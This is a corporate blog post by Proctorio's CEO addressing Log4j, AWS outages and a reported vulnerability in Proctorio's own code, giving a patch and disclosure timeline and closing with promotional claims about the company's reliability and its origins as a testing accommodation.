Security in an Unsecured World
Mike Olsen, Founder & CEO January 5, 2022
A trio of recent headlines have challenged the sense of security students and institutions should feel around the very important act of test taking. While none of the three resulted in any data or privacy breaches for Proctorio users, I want to briefly discuss each of them here.
First up, Apache Log4j. This is a Java-based logging tool that developers embed to analyze performance data in websites and applications. A vulnerability was discovered that enabled hackers to potentially compromise servers. Proctorio, however, does not rely in any way on Log4j so this breach did not affect anyone using our service. Our nightly scanners and WAF rules have been updated to scan and protect against this attack, respectively out of precaution.
The second big story was about the multiple AWS outages in the last month. Amazon Web Services powers much of the internet. When they go down, many of the websites and apps that people rely on daily go down as well. Long ago, we decided Proctorio would spread our infrastructure not just across regional hubs of AWS but across multiple cloud providers. It was a costly decision and one that many people told me was overly cautious, but it's the smartest logistical choice we've made in our eight years.
The third story hit a bit closer to home as it related to a vulnerability that was discovered in Proctorio's own code. Here's a brief timeline. On June 17th of this summer, a group called Sector7 contacted us about a vulnerability they had discovered in our code. They have a reputation as a sophisticated group of ethical hackers and, I have to admit, I was impressed. This was a complex hack that they orchestrated, but it worked.
No coder likes to find that their work is fallible, but it's part of the job. In fact, we've baked it into operations here at Proctorio. We work with a group called HackerOne specifically to keep us on our toes and honest. We credit our collaboration with ethical hackers as one of the reasons why our service keeps improving. We patched, tested and released the fix to production within a week on June 24th (7 days later). Sector7 acknowledged the successful patching of the vulnerability on August 3rd.
On September 19th, we took the further step towards transparency by filing for public disclosure ourselves. This required Sector7 to approve the release. When they did not, we reached out to them on December 13th and officially closed the matter. Working with HackerOne and the greater ethical Hacker community, going forward, Proctorio will be allowed to publish these instances after 30 days on our own. What's more important is using our telemetry logs and confirming with Sector7 that they were, indeed, the only instance to exploit this vulnerability. We can safely say that not only was this potential exploit fixed quickly, it did not impact the security or privacy of our end users.
This is how we keep your data secure.
A lot of people forget that Proctorio started out as an accommodation. In education circles, an accommodation is anything a university or institution can provide for a student who has additional needs in order to take a test to the best of their ability. This could be a student experiencing dyslexia being given extra time or someone with autism who needs a less stimulating environment. Proctorio was designed to similarly extend the promise of education to rural people so they'd need to make one less trip into town, to working parents who needed to stay with a sick child, to people changing industries who have a full work schedule at their day job.
For the first five years, we operated largely out of the spotlight. We built our business one university at a time. Then one college system at a time. Then one governmental agency at a time. At each step we balanced the desire to democratize education with the very real need to keep the testing process safe and secure. We like to say in our eight years of operation, we've only been down for eight minutes. That's a snappy line from our marketing department, but it's a number we're quietly very proud of.
Always available. Always secure.